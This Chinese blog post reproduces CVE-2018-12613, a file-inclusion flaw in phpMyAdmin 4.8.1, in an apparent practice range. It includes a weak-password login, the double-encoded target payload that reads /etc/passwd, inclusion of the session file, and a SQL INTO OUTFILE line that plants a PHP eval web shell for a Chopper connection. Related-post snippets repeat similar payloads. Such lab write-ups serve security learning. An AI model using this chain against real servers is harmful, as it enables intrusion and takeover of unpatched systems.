PhpMyAdmin4.8.1后台文件包含漏洞复现(CVE-2018-12613)

最新推荐文章于 2024-05-27 17:25:08 发布
最新推荐文章于 2024-05-27 17:25:08 发布
阅读量2.2k 收藏 6
点赞数 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hclimg/article/details/102783871
版权

       phpmyadmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。

      漏洞复现环境:基于某平台的在线靶场进行漏洞复现

复现过程:

1. 访问网址,是一处phpmyadmin的登录地址首页,通过弱密码可以进入数据库管理界面

2. 根据在网上曝光的 CVE-2018-12613 的漏洞详情,在index.php后添加?target=db_sql.php%3f/../../../../../../../../etc/passwd,显示/etc/passwd的详细内容,可见 ,该版本确实存在文件包含漏洞

3.F12查看复制该网站的session值,然后访问/index.php?target=db_sql.php%253f/../../../../../../tmp/sess_[session],显示phpInfo的默认页面,在该页面找到网站的安装位置:/var/www/html

 

4.写入一句话木马,select '<?php @eval($_POST[hcl]) ?>' into outfile '/var/www/html/hcl.php'

5.上菜刀,连接 http://ip/hcl.php,菜刀连接成功,在根目录下找到了key.txt文件,查看key.txt文件,获得key值。

6. 完成!!!

 

知识点:每次登录phpmyadmin系统的时候,系统就会产生一个sess_sessionID的文件,然后在里面执行的操作,会被记录到这个文件内(linux系统中存放路径为/tmp/sess_[当前会话session值])。

搬砖的雪明酃
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
phpmyadmin 远程文件包含漏洞CVE-2018-12613) - tdcoming'blog QQ group 906
08-04
漏洞背景背景介绍phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具…阅读数 156博文CVE-2018-12613 --- 本地文件包含造成
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-02
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
[GWCTF 2019]我有一个数据库
Yb_140的博客
10-12 548
进行两次编码,两次编码的值就是%253f,第一次url解码是由服务器自动解码的,然后经过urldecode之后变为?截取前面的值,所以前面我们传入一个在白名单里的值。4.不能在 $target_blacklist数组里面(即不能为import.php,export.php)经过 urldecode 函数解码后的 $_page 存在在 $whitelist 中返回 true。如果 $_page 存在在 $whitelist 中返回 true;$page 如果存在在 $whitelist 中返回 true;
[GWCTF 2019]我有一个数据库(CVE-2018-12613)
记录学习,一起进步
01-29 272
[GWCTF 2019]我有一个数据库(CVE-2018-12613)
phpmyadmin漏洞汇总
最新发布
m0_64481831的博客
05-27 1038
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql的数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库。
[Vulhub](CVE-2018-12613phpmyadmin 4.8.1远程文件包含漏洞
weixin_45605352的博客
05-06 956
0x01 预备知识 什么是文件包含漏洞? 攻击者利用包含的特性,加上应用本身对文件(包含)控制不严格,最终造成攻击者进行任意文件包含。(注:包含的文件会被当成脚本文件来解析) 一句话来说就是:文件包含并不属于漏洞,但是由于对包含进来的文件不可控,导致了文件包含漏洞的产生。 本地文件包含叫做LFI,远程文件包含叫做RFI,默认PHP不开启远程文件包含。 相关函数 include:PHP运行到include然后去调用被包含文件执行,如果包含文件不存在则报错,但是会继续往下执行; require:PHP在运
[GWCTF 2019]我有一个数据库 WP
weixin_52599204的博客
08-05 891
提示我有一个数据库,但里面什么都没有,于是拿dirsearch跑了一下,没有出结果。那么思路肯定就是复现漏洞了,于是开始找。但是有数据库嘛,那么试试常见的几个加上。看到最多的是文件包含漏洞 编号。最后的payload。...
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin...
CVE-2018-12613Phpmyadmin后台 任意文件包含漏洞复现
weixin_55821558的博客
04-26 749
环境:php 5.5.30 工具:phpstudy(小皮面板) 这个漏洞是源于phpmyadmin中的index.php,下面是源码: 以上进行一下分析: 1.传入的target不能为空 2.必须是一个字符串 3.不能以index开头 4.不能再数组target_blacklist中 5.且经过checkPageValidit检查后为真 首先前三个都很好理解 我们先看一下第四个 黑名单为: 在index.php中,已经事先定义了target_blacklist的值,即import.php和ex
[GWCTF 2019]我有一个数据库 1
m0_62879498的博客
05-04 2463
[GWCTF 2019]我有一个数据库 1 打开环境 什么都没有 使用dirsearch爆破网站目录,发现了index.php,phpmyadmin, phpinofo以及root.txt 只有phpmyadmin提供了有用信息 我们访问一下 乍一看,感觉是毫无头绪 但,仔细观察 phpmyadmin 的版本信息 在该版本的 phpmyadmin 存在框架代码漏洞 $target_blacklist = array ( 'import.php', 'export.php' ); // If
vulhub-phpmyadmin
bqnagus
10-02 346
vulhub-phpmyadmin复现
CVE-2018-12613 (phpmyadmin 4.8.1 远程文件包含漏洞)
weixin_44732566的博客
07-04 482
phpmyadmin 4.8.1 远程文件包含漏洞CVE-2018-12613phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 0x01 影响范围 phpMyAdmin 4.8.0 and 4.8.1 are affected. 0x02 原理 漏洞代码 $target_blacklist = array ( 'import.php', 'export.php' ); //
phpmyadmin 4.8.1 Remote File Inclusion Vulnerability (CVE-2018-12613)漏洞复现
qq_43200143的博客
01-29 307
漏洞利用过程: vulhub.org docker环境启动后 1.访问 http://your-ip:8080 访问phpmyadmin。 配置的是config模式,无需输入密码,直接登录test账户 2.访问http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 即可包含本地文件 还可以进行getshell 思路:把webshell写入到数据.
phpMyAdmin 4.8.x 最新版 本地文件包含漏洞利用
Ambulong的博客
06-21 5971
今天ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞phpmyadmin4.8.1后台getshell。该漏洞利用不要求root帐号,只需能够登录 phpMyAdmin 便能够利用。 在这篇文章中我们将使用VulnSpy的在线 phpMyAdmin 环境来演示该漏洞利用。 VulnSpy 在线 phpMyAdmin 环境地址:http://www.vulnspy.c...
phpMyAdmin4.8.1漏洞复现利用
qq_43579362的博客
09-08 2113
一.环境配置 我采用的是Windows+phpstudy配置的运行环境,将phpMyAdmin4.8.1下载好解压到phpstudy网站根目录即可,这里需要注意的是php版本和Mysql的版本 配置好后,直接访问http://localhost/phpMyAdmin 登陆成功成功后你会遇到下图 解决方法: 修改phpMyAdmin/libraries文件下的config.default.php里面的$cfg['blowfish_secret']配置,随意修改保存即可,长度一定要达到要求。 二.漏洞
phpmyadmin文件包含
热门推荐
vergilben的学习日记
04-03 1万+
CVE-2018-12613 — 本地文件包含造成远程代码执行漏洞复现,其实就是我们常见的LFI漏洞。在我前面写的博客里面又详细介绍。这次我们直接进入墨者学院进行复现,不再自行搭建环境。 进入环境 这里使用弱口令进入,账号root,密码root。 进入之后页面如下: 执行sql语句挂入一句话木马 进入SQL执行页面 点击执行。 使用中国菜刀连接服务器 在根目录下我们发现key.txt文件,...
CVE-2016-5734
09-04
- *2* *3* [CVE-2016-5734 Phpmyadmin后台代码执行漏洞复现](https://blog.csdn.net/weixin_41924764/article/details/113063083)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值